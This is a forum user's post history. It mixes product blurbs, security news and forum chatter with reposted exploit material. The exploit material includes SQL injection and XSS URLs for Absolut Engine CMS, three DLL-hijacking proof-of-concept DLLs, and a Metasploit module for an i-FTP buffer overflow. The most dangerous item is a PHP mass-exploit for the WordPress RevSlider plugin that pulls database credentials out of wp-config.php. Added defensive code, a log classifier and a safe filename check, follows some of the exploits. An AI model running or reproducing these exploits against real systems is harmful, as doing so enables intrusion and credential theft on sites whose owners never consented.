Posts: 3453
Days Won: 22
Everything posted by Aerosol
-
CrashPlan aims to make backing up your files and data as easy as possible; it sits in the background on your computer, silently and continually backing up your files while using minimal CPU and RAM. You can store your encrypted backups locally on your own computer, external drives (including USB flash), or other computers. With the Family Unlimited plan, you also have the ability to store backups in CrashPlan’s online unlimited cloud storage. Yes, that is unlimited as in you can store as many files as you like in cloud storage — there is no space limitation. CrashPlan is available on all major platforms — desktop and mobile. Try it now!
-
Windows Blu-ray Player allows you to play Blu-ray discs, folders, and ISOs on your computer. It can also play DVDs, videos, and audio, and view photos and images — an all-in-one media playback program for your needs.
-
Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.1.73 CMS
Advisory ID: SROEADV-2014-08
Author: Steffen Rösemann
Affected Software: CMS Absolut Engine v. 1.73
Vendor URL: http://www.absolutengine.com/
Vendor Status: solved
CVE-ID: -

==========================
Vulnerability Description:
==========================

The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL injection vulnerabilities and an XSS vulnerability in its administrative backend.

==================
Technical Details:
==================

The following PHP scripts are prone to SQL injections:

managersection.php (via sectionID parameter)
http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1
Exploit Example:
http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+

edituser.php (via userID parameter)
http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3
Exploit Example:
http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+

admin.php (via username parameter, blind SQL injection)
http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7
Exploit Example:
http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7

managerrelated.php (via title parameter)
http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}
Exploit Example:
http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+

The last PHP script is also vulnerable to a reflected XSS vulnerability.
Exploit Example:
http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

Although this is a product which is not actively developed anymore, I think it is worth mentioning, as the idea (of the lists) is to keep tracking (unknown) vulnerabilities in software products (but that is a personal point of view). Moreover, this product is still in use by some sites (!) and it is offered without a hint of its status.

=========
Solution:
=========

As the CMS is not actively developed, it shouldn't be used anymore.

====================
Disclosure Timeline:
====================

29-Dec-2014 – found the vulnerability
29-Dec-2014 – informed the developers
29-Dec-2014 – release date of this security advisory [without technical details]
30-Dec-2014 – Vendor responded, won't patch vulnerabilities
30-Dec-2014 – release date of this security advisory
30-Dec-2014 – post on FullDisclosure

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

http://www.absolutengine.com/
http://sroesemann.blogspot.de

Source
-
China is known as the nation of 'global internet censorship', and the country has proved it many times, in fact most recently when it blocked access to Gmail from the country. Now, it seems that its northern neighbouring country, India, doesn't want to be left behind. On Wednesday, the Indian Computer Emergency Response Team issued the ban, asking internet service providers and mobile operators to block access to dozens of popular websites in the name of its censorship laws, according to a government advisory made public by Pranesh Prakash, director of the Centre for Internet and Society in Bangalore. As many as 32 websites including GitHub, PasteBin, Vimeo, Imgur, DailyMotion and Internet Archive have reportedly been banned in India under an order from the Department of Telecom (DoT). Vodafone, the second largest mobile network operator in India (after Airtel) with an estimated 173 million customers, and BSNL, the Indian state-owned telecom operator with 117 million customers, have already blocked access to the above-mentioned websites. However, other telecom operators and ISPs are still providing access to those websites. The Indian government has accused the websites of hosting anti-India content posted by members of a terrorist organization called the Islamic State group, also known as ISIS. Now this is really insane. On one side, the Indian government talks about Internet freedom in the country, and on the other side, the government is blocking access to sites like GitHub, which has over 8 million registered users worldwide. I have no idea how the GitHub website could spread inflammatory content among Indians, when it is actually used to store source code from over 8 million users. OK, let us agree that it is actually hosting something unusual against the nation’s interest. But, even if a single page was found guilty, the blockage of the entire website seems a totally nonsensical decision.

The notice sent to all Internet Service Licensees mentions Section 69A of the IT Act, 2000, which states "Power to issue directions for blocking for public access of any information through any computer resource." Based on this, the DoT has decided to immediately block access to 32 websites. Prakash posted a copy of the notice listing the 32 blocked URLs. The URLs listed include:

justpaste.it
hastebin.com
codepad.org
freehosting.com
vimeo.com
dailymotion.com
pastebin.com
gist.github.com
archive.org
ipaste.eu
github.com (gist-it)
pastie.org
pastee.org
paste2.org
thesnippetapp.com
snipt.net
tny.cz (Tinypaste)
slexy.org
paste4btc.com
0bin.net
heypasteit.com
sourceforge.net/projects/phorkie
atnsoft.com/textpaster
hpage.com
ipage.com
webs.com
weebly.com
000webhost.com
snipplr.com
termbin.com
snippetsource.net
cryptbin.com

However, the contents of the list are particularly embarrassing for Prime Minister Narendra Modi as well, who unveiled a "Make In India" campaign earlier this year in an attempt to encourage international businesses to invest in India, which also includes the information technology sector. And blocking websites like GitHub is most definitely not in sync with that vision. Source
-
Since the disclosure of a serious file-upload vulnerability in WordPress Symposium and the public availability of proof-of-concept exploit code, attacks against sites running the plug-in are starting to raise concern. Researchers at Trustwave SpiderLabs on Tuesday said they had snared a number of exploit attempts in their honeypot, and researchers at Sucuri have been monitoring scans for the plug-in since the start of the month, almost two weeks before the Dec. 11 public disclosure by Italian researcher Claudio Viviani. The vulnerability allows an attacker to upload files without authentication to sites running Symposium, SpiderLabs lead researcher Ryan Barnett wrote in an advisory. In one such exploit attempt, Barnett said an attacker uploaded a PHP file that included various PHP backdoor code through which a hacker could send commands over HTTP. The file also included the WSO webshell, which provides a remote view into a server’s management interface. According to statistics from WordPress, the plug-in has been downloaded slightly more than 150,000 times, which pales in comparison to some of the more popular plug-ins such as Akismet (27 million downloads) and Contact Form 7 (22 million). Despite the relatively low number of downloads, the public availability of PHP exploit code and the ease with which hackers are able to locate sites running the vulnerable plug-in merits site operators evaluating the risk. “The end goal of most of these attackers is to install webshell/backdoors so that they can have access/control on the website,” Barnett told Threatpost. “They monitor for new 0-day vulnerabilities to exploit, to then install the webshells. WP-Symposium is simply the ‘vuln of the day.'” The WSO webshell has been used by hackers before in order to gain remote control over a website; the webshell enables attackers to remotely read files and databases, execute OS-level commands, install drive-by-download malware links and even attack other websites, Barnett said.

Compounding the problem is the fact that despite updated versions of the plug-in being available, Barnett said the problem persists. “I downloaded the latest version of the code from both the WordPress website and directly from the wpsymposium site and verified that it is still vulnerable,” Barnett said. Barnett said that vulnerable files are also present in the mobile version. Those files are:

/wp-symposium/server/php/index.php
/wp-symposium/server/php/UploadHandler.php
/wp-symposium/mobile-files/server/php/index.php
/wp-symposium/mobile-files/server/php/UploadHandler.php

Researchers at Sucuri said they were able to verify similar attacks against sites running Symposium. Sucuri reports an increase in Internet scans for the plug-in starting early this month, especially after Dec. 11 when the vulnerability was publicly disclosed. The number of scans per day peaked on Monday at close to 3,800. Sucuri said the first two exploits were attempted on Dec. 1 and Dec. 9, two days before disclosure. “Someone out there knew of this vulnerability and was actively attempting to exploit it,” Sucuri’s David Dede wrote in an advisory. “Whether it was made public via underground forums, they are the ones that found it or some other means. Either way, we were dealing with an active 0-day vulnerability.” Source
-
Hi, I also want to report @wHoIS: why are you going off-topic? I never asked for attention, neither from you nor from anyone else. If you are not part of the staff, please stop posting nonsense!
-
“The year 2014 will be remembered as ‘The Year of Shaken Trust,’” says Vincent Weafer, senior vice-president at McAfee Labs, which is part of Intel Security. “This unprecedented series of events shook industry confidence in long-standing Internet trust models, consumer confidence in organizations’ abilities to protect their data, and organizations’ confidence in their ability to detect and deflect targeted attacks in a timely manner.” Here are some of the more notable cyber-security issues that grabbed the spotlight in 2014.

1. eBay gets hacked
In February, eBay reveals that hackers managed to steal the personal records of 233 million users of the popular online auction service. Records included usernames, passwords, phone numbers and home addresses.

2. Heartbleed and the Canada Revenue Agency
In April, researchers disclose the HeartBleed vulnerability, which is a massive mistake in the software code that drives secure communication, Secure Socket Layer encryption, online. In July, the Canada Revenue Agency reports its systems have been breached due to the HeartBleed vulnerability and tax information from an undisclosed number of Canadians has been stolen. Stephen Arthuro Solis-Reyes, a young man from London, Ont., has been charged in connection with the CRA attack.

3. NRC hit by sophisticated hackers
Also in July, highly sophisticated state-sponsored hackers from China are alleged to have targeted and attacked the National Research Council, making off with classified information from government computers.

4. Jennifer Lawrence and other celebrities targeted
In August, hackers gained access to Apple Inc.’s iCloud service, stealing thousands of personal photos of celebrities in various stages of undress, including photos of Hunger Games star Jennifer Lawrence, who referred to it in one media report as a “sex crime.”

5. About 70 million Home Depot customers victimized
In September, Home Depot announced its systems were compromised by hackers and personal banking information from more than 70 million customers throughout the U.S. and Canada was exposed.

6. You thought HeartBleed was bad? Meet Bash Bug
Also in September, researchers discover the Bash Bug (also called ShellShock), which is worse than HeartBleed. The bug allows an attacker to make a specific request through a prompt online that opens access to the operating system, giving the hacker access to any Unix-based system and leaving a gateway so the hacker can return at a later date.

7. Personal data stolen from J.P. Morgan customers — 76 million of them
In October, J.P. Morgan Chase & Co. revealed that hackers had stolen the personal information of more than 76 million customers and seven million small businesses.

8. Wirelurker preys on Apple iOS devices
In November, researchers at Palo Alto Networks found malware that attacks Apple Inc.’s iOS devices called Wirelurker. The program, which spreads to the device through an infected PC, is designed to collect call logs, contact information and other sensitive data from the devices.

9. Remember the dancing banana?
It was also in November that a hacker named Aerith tricked a network technician into redirecting visitors to the City of Ottawa’s home page to another address depicting a dancing banana. He then attacked the Ottawa police website as well as other websites with unsophisticated, yet problematic, denial of service attacks.

10. The Interview
In December, Sony Pictures was the victim of a massive hack on its systems by a group claiming to oppose the release of the motion picture The Interview, a film that depicts two journalists in their attempt to assassinate North Korean leader Kim Jong-un. Hackers made off with personal information and emails, corporate secrets (including upcoming screenplays) and reams of other communications and sensitive data. Source
-
/*
 * Exploit Title: iFunbox 2014 3.4.697.652 DLL Hijacking Exploit (itunesmobiledevice.dll)
 * Date: 25/12/2014
 * Author: Hadji Samir s-dz@hotmail.fr
 * Vendor Homepage: http://i-funbox.com/
 * Soft link: http://dl.i-funbox.com/ifunbox2014_setup.exe
 * Tested on: windows 7 fr
 */
#include <windows.h>

/* Prototype added: owned() was called from DllMain before it was declared. */
void owned(void);

BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        owned();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/* Proof of concept: only pops a message box when the planted DLL gets loaded. */
void owned(void)
{
    /* "\H" is not a valid C escape sequence; a line break was evidently intended. */
    MessageBox(0, "iFunbox DLL Hijacked\nHadji Samir", "POC", MB_OK);
}

Source
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh
  include REXML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'i-FTP Schedule Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability
        in i-Ftp v2.20, caused by a long time value set for scheduled
        download. By persuading the victim to place a specially-crafted
        Schedule.xml file in the i-FTP folder, a remote attacker could
        execute arbitrary code on the system or cause the application
        to crash. This module has been tested successfully on Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom',      # Vulnerability discovery and PoC
          'Gabor Seljan'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'EDB', '35177' ],
          [ 'OSVDB', '114279' ],
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d\x20\x22",
          'Space'    => 2000
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              'Offset' => 600,
              'Ret'    => 0x1001eade # POP ECX # POP ECX # RET [Lgi.dll]
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 06 2014',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'Schedule.xml'])
      ], self.class)
  end

  def exploit
    evil = rand_text_alpha(target['Offset'])
    evil << generate_seh_payload(target.ret)
    evil << rand_text_alpha(20000)

    xml = Document.new
    xml << XMLDecl.new('1.0', 'UTF-8')
    xml.add_element('Schedule', {})
    xml.elements[1].add_element(
      'Event', {
        'Url'    => '',
        'Time'   => 'EVIL',
        'Folder' => ''
      })

    sploit = ''
    xml.write(sploit, 2)
    sploit = sploit.gsub(/EVIL/, evil)

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end

Source
-
/*
 * Exploit Title: iExplorer 3.6.3.0 DLL Hijacking Exploit (itunesmobiledevice.dll)
 * Date: 25/12/2014
 * Author: Hadji Samir s-dz@hotmail.fr
 * Vendor Homepage: http://www.macroplant.com/
 * Soft link: http://www.macroplant.com/downloads
 * Tested on: windows 7 fr
 */
#include <windows.h>

/* Prototype added: owned() was called from DllMain before it was declared. */
void owned(void);

BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        owned();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/* Proof of concept: only pops a message box when the planted DLL gets loaded. */
void owned(void)
{
    /* "\H" is not a valid C escape sequence; a line break was evidently intended. */
    MessageBox(0, "iExplorer DLL Hijacked\nHadji Samir", "POC", MB_OK);
}

Source
-
/*
 * Exploit Title: MobiConnect 23.009.17.00.216 HUAWEI Insecure Permissions Local Privilege Escalation & DLL Hijacking Exploit (wintab32.dll)
 * Date: 25/12/2014
 * Author: Hadji Samir s-dz@hotmail.fr
 * Vendor Homepage: http://www.mobilis.dz/entreprises/mobiconnect.php
 * Vendor: http://www.huawei.com/
 * Tested on: windows 7 FR
 *
 * ##################### Insecure Permissions Local Privilege Escalation ####################
 *
 * C:\Program Files>cacls "MobiConnect"
 * C:\Program Files\MobiConnect BUILTIN\Utilisateurs:(OI)(IO)F
 *                              BUILTIN\Utilisateurs:(CI)F
 *                              NT SERVICE\TrustedInstaller:(ID)F
 *                              NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
 *                              AUTORITE NT\Système:(ID)F
 *                              AUTORITE NT\Système:(OI)(CI)(IO)(ID)F
 *                              BUILTIN\Administrateurs:(ID)F
 *                              BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F
 *                              CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F
 *
 * C:\Program Files\MobiConnect>cacls "MobiConnect.exe"
 * C:\Program Files\MobiConnect\MobiConnect.exe BUILTIN\Utilisateurs:F
 *                                              AUTORITE NT\Système:(ID)F
 *                                              BUILTIN\Administrateurs:(ID)F
 *
 * ######################## DLL Hijacking Exploit (wintab32.dll) #########################
 */
#include <windows.h>

/* Prototype added: owned() was called from DllMain before it was declared. */
void owned(void);

BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        owned();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/* Proof of concept: only pops a message box when the planted DLL gets loaded. */
void owned(void)
{
    /* "\H" is not a valid C escape sequence; a line break was evidently intended. */
    MessageBox(0, "MobiConnect DLL Hijacked\nHadji Samir", "POC", MB_OK);
}

Source
-
# Exploit Title: [Wordpress RevSlider Plugin LFD]
# Google Dork: inurl:/admin-ajax.php?action=revslider_show_image
# Date: 12/29/14
# Exploit Author: FarbodEZRaeL
# Vendor Homepage: iranhack.org
# Software Link: wordpress.org
# Tested on: windows
#Exploit:

<html>
<head>
<title>Exploits Wordpress</title>
</head>
<body style="background-color: rebeccapurple;">
<pre><p><center style="color: aqua;">
=============================================================
=  Exploits Wordpress RevSlider Plugin LFD Vuln             =
=                                                           =
=  Coded by FarbodEZRaeL                                    =
=  Iranhack Security team                                   =
=  www.iranhack.org                                         =
=  Fix bug Other Version                                    =
=============================================================
<pre><href>
<form method='POST'>
<textarea name='sites' cols='45' rows='0'></textarea>
<br>
<input type='submit' value='Exploit' />
</form>
<?php
# Coded by FarbodEZRaeL
# Exploits Wordpress RevSlider Plugin LFD Vuln
@file_get_contents("$site/?author=1");
preg_match('/<title>;(.*?)<\/title>/si',$users,$user);
$wpuser = explode('|',$user[1]);
echo " <br>======================================</br>";
echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$xp = curl_exec ($ch);
curl_close($ch);
if(preg_match("#DB_USER#i",$xp)){
    preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
    echo "DB_NAME:{$DB_NAME[1]}<br>";
    preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
    echo "DB_USER:{$DB_USER[1]}<br>";
    preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
    echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
    preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
    echo "DB_HOST:{$DB_HOST[1]}<br>";
}
$lt = array(
    "wp-content/themes/construct/lib/scripts/dl-skin.php",
    "wp-content/themes/persuasion/lib/scripts/dl-skin.php",
    "wp-content/themes/manbiz2/lib/scripts/dl-skin.php",
    "wp-content/themes/method/lib/scripts/dl-skin.php",
    "wp-content/themes/elegance/lib/scripts/dl-skin.php",
    "wp-content/themes/modular/lib/scripts/dl-skin.php",
    "wp-content/themes/myriad/lib/scripts/dl-skin.php",
    "wp-content/themes/echelon/lib/scripts/dl-skin.php",
    "wp-content/themes/fusion/lib/scripts/dl-skin.php",
    "wp-content/themes/awake/lib/scripts/dl-skin.php"
);
foreach($lt as $l){
    $site = "$site/$l";
    $process = curl_init($site);
    curl_setopt($process, CURLOPT_TIMEOUT, 30);
    curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
    curl_setopt($process, CURLOPT_HEADER, TRUE);
    curl_setopt($process, CURLOPT_POST, 1);
    curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
    curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
    $return = curl_exec($process);
    if(preg_match("#DB_USER#i",$return)){
        preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
        echo "DB_NAME:{$DB_NAME[1]}<br>";
        preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
        echo "DB_USER:{$DB_USER[1]}<br>";
        preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
        echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
        preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
        echo "DB_HOST:{$DB_HOST[1]}<br>";
        break;
        echo " <br>-----------------------------------</br>";
        ob_implicit_flush(true);
        ob_end_flush();
    }
}
}
?>
</pre></p></center>

Source
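Every request this script (and the WP Symposium attacks described in the Threatpost post further up) sends leaves a line in the web server's access log: a revslider_show_image call with a traversal in img, a POST to a theme's dl-skin.php, a POST to one of the four Symposium upload handlers, and the ?author=1 user enumeration. The detection script below is an added example, not code from either post; the log lines are constructed, and the tag names and the assumption that Symposium lives under the usual plugin directory are mine.

```python
"""Classify Apache combined-format access log lines against the WordPress
exploit patterns described on this page (RevSlider LFD, dl-skin.php theme
downloader, WP Symposium upload handlers, author enumeration)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# ip ident user [time] "METHOD path HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Upload handlers named in the WP Symposium post (desktop and mobile copies);
# matched as path suffixes because the plugin directory prefix varies.
SYMPOSIUM_UPLOAD_PATHS = (
    "/wp-symposium/server/php/index.php",
    "/wp-symposium/server/php/UploadHandler.php",
    "/wp-symposium/mobile-files/server/php/index.php",
    "/wp-symposium/mobile-files/server/php/UploadHandler.php",
)


def classify(line):
    """Return a tag naming the exploit pattern a line matches, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable; a real pipeline would count these separately
    method, raw_path = m.group("method"), m.group("path")
    parts = urlsplit(raw_path)
    path = unquote(parts.path)
    query = parse_qs(parts.query)

    # RevSlider: admin-ajax.php?action=revslider_show_image&img=<file>
    if path.endswith("/wp-admin/admin-ajax.php") and query.get("action") == ["revslider_show_image"]:
        img = unquote(query.get("img", [""])[0])  # second decode catches %252e%252e
        if ".." in img or img.endswith("wp-config.php"):
            return "revslider_lfd"
        return "revslider_show_image"  # legitimate plugin use; count it, do not alert

    # Theme downloader the script POSTs "_mysite_download_skin=../.." to.
    if method == "POST" and path.endswith("/lib/scripts/dl-skin.php"):
        return "dl_skin_post"

    # WP Symposium upload handlers: uploads are supposed to come from logged-in
    # users, so any POST here deserves review when the plugin is installed.
    if method == "POST" and any(path.endswith(p) for p in SYMPOSIUM_UPLOAD_PATHS):
        return "symposium_upload"

    # /?author=1 is used to enumerate the first (usually admin) username.
    if path == "/" and "author" in query:
        return "author_enum"
    return None


def scan(log_text):
    """Group matched tags by client IP, in log order: {ip: [tag, ...]}."""
    hits = {}
    for line in log_text.splitlines():
        tag = classify(line)
        if tag:
            ip = LOG_RE.match(line).group("ip")
            hits.setdefault(ip, []).append(tag)
    return hits


# Constructed sample log (documentation IP ranges), mirroring the script above.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Dec/2014:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3311 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
203.0.113.7 - - [29/Dec/2014:10:01:03 +0000] "POST /wp-content/themes/awake/lib/scripts/dl-skin.php HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
198.51.100.9 - - [29/Dec/2014:10:02:10 +0000] "POST /wp-content/plugins/wp-symposium/server/php/index.php HTTP/1.1" 200 88 "-" "curl/7.38.0"
192.0.2.44 - - [29/Dec/2014:10:03:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=revslider/slide1.jpg HTTP/1.1" 200 40211 "http://example.com/" "Mozilla/5.0"
192.0.2.45 - - [29/Dec/2014:10:04:00 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG).items():
        print(ip, tags)
```

A 200 on the revslider_lfd line means the file was actually served, which is the cue to rotate the database credentials in wp-config.php, not just to block the IP.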
-
------------------------------------------------------------------------------
Symantec Web Gateway <= 5.2.1 (restore.php) OS Command Injection Vulnerability
------------------------------------------------------------------------------

[-] Software Link:

http://www.symantec.com/web-gateway/

[-] Affected Versions:

Version 5.2.1 and prior versions.

[-] Vulnerability Description:

The vulnerable code is located in the /spywall/restore.php script:

79.   $temp_file_name = trim($restore_file["tmp_name"]);
80.   $upload_orig_name = basename($restore_file['name']);
81.   //do this in case user change .des3 extnsion to .bak which is idential to backup file ...
82.   $temp_orig_name = str_replace(".bak", ".des3",$upload_orig_name);
83.
84.   $filePath = "/tmp/$temp_orig_name";
85.
86.   syscall ("sudo rm -f $filePath"); //make sure this file not exists.

User input passed via the filename of uploaded files is not properly sanitised before being used in a call to the "syscall()" function at line 86. This can be exploited to inject and execute arbitrary OS commands with the privileges of the "root" user on the appliance. NOTE: version 5.1.1 suffers from an access restriction issue as well, meaning that the vulnerability can be exploited by any kind of user (even the ones with the lowest access privileges). In version 5.2.1 the vulnerability has been fixed and proper authorization checks are in place; however, the vulnerability has been reintroduced in a different line of code and can be exploited only by administrator users.

[-] Solution:

Update to version 5.2.2.

[-] Disclosure Timeline:

[08/10/2014] - Vendor notified with vulnerability details
[05/11/2014] - Vendor replies this will be fixed in the next release
[16/12/2014] - Version 5.2.2 released
[16/12/2014] - Vendor publishes security bulletin
[31/12/2014] - Publication of this advisory

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2014-7285 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano, Secunia Research.

[-] Original Advisory:

http://karmainsecurity.com/KIS-2014-19

Source
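The root cause at lines 79-86 is that a user-supplied filename is interpolated into a shell command string. As an added example (not Symantec's code or the advisory's), the same three steps are reimplemented in Python beside a hardened version: the upload name must match a strict pattern and must not change under basename(), and the stale file is removed with os.remove instead of a shell. TMP_DIR, safe_restore_name and remove_stale_restore_file are names chosen for this example.

```python
"""Unsafe versus safe handling of an uploaded backup filename, modelled on the
restore.php snippet quoted in the advisory (CVE-2014-7285)."""
import os
import re
import tempfile

TMP_DIR = "/tmp"  # the advisory's hard-coded staging directory

# Plain filenames only: letters, digits, dot, underscore, dash; no separators,
# whitespace or shell metacharacters, and a bounded length.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,128}$")


def unsafe_rm_command(upload_name):
    """What lines 80-86 effectively did: basename, .bak -> .des3, then a shell
    command string. Returned rather than executed so the effect of the name
    on the command can be inspected; the shell would parse any metacharacter
    inside upload_name as part of the command line."""
    temp_orig_name = os.path.basename(upload_name).replace(".bak", ".des3")
    file_path = f"{TMP_DIR}/{temp_orig_name}"
    return f"sudo rm -f {file_path}"


def safe_restore_name(upload_name):
    """Return the .des3 name to stage under TMP_DIR, or None if the upload
    name is rejected. Rejects anything basename() would alter (a path was
    supplied), anything outside SAFE_NAME_RE, dot-only names, and any
    extension other than .bak or .des3 (suffix only, not str_replace)."""
    name = os.path.basename(upload_name)
    if name != upload_name or not SAFE_NAME_RE.match(name):
        return None
    if name.strip(".") == "":
        return None  # "." or ".." survive the pattern but are not files
    if name.endswith(".bak"):
        name = name[:-4] + ".des3"
    elif not name.endswith(".des3"):
        return None
    return name


def remove_stale_restore_file(upload_name, tmp_dir=TMP_DIR):
    """Safe replacement for syscall("sudo rm -f $filePath"): validate first,
    then delete directly. No shell is involved, so the name is never parsed.
    Returns the removed path, or None if the name was rejected or nothing
    existed."""
    name = safe_restore_name(upload_name)
    if name is None:
        return None
    path = os.path.join(tmp_dir, name)
    try:
        os.remove(path)
    except FileNotFoundError:
        return None
    return path


def demo():
    """Stage a file in a private temp dir and remove it through the safe path."""
    d = tempfile.mkdtemp()
    staged = os.path.join(d, "backup.des3")
    open(staged, "w").close()
    removed = remove_stale_restore_file("backup.bak", tmp_dir=d)
    gone = not os.path.exists(staged)
    os.rmdir(d)
    return removed == staged and gone


if __name__ == "__main__":
    print(unsafe_rm_command("backup.bak"))
    print(safe_restore_name("backup.bak"), safe_restore_name("../backup.bak"))
    print("demo ok:", demo())
```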
-
@AndreiMihai I didn't lie, you made the bot insult em. You told the bot !injura em, I'll post a screenshot, you can't deny it. And em saw it when you made the bot insult him.
-
Long live eusimplu too, for he's blacker than a matchstick. Happy New Year, RST!
-
A federal judge in New Jersey has approved of law enforcement's use of a fake Instagram account to collect evidence on a man suspected of stealing millions of dollars' worth of jewelry. Daniel Gatson was charged with conspiracy to transport and receive stolen property and interstate transport of stolen property, according to the court's opinion. Gatson and conspirators allegedly ransacked multiple households in wealthy areas around the country, some of which were located in New Jersey. In one instance, Gatson and two others broke into a home in Holmdel, N.J., and stole about $7,000 in jewelry. Law enforcement tracked each member's cell phone location and determined that they were near multiple burglaries, including the Holmdel case, and during that robbery an authorized wiretap was used to intercept a call between two of the men. The recently published court opinion refutes Gatson's claims that information was obtained unlawfully by law enforcement. Gatson specifically challenges the use of his Instagram account to get information about the case. He argued that there was no “probable cause to search and seize items in his Instagram account,” the opinion says. United States District Judge William Martini wrote that when Gatson accepted a friend request from an undercover Instagram account, that was consensual, meaning no search warrant is required for the type of information obtained. “Gatson's motion to suppress the evidence obtained through the undercover account will be denied,” Martini wrote. The case is being compared to a similar one regarding a Facebook account created by a federal agent. In that case, a U.S. Drug Enforcement Administration Special Agent used photos from a woman's seized cell phone to create an account and communicate with suspected criminals, according to BuzzFeed News. The incident was under review in October and was denounced by Facebook. Source
-
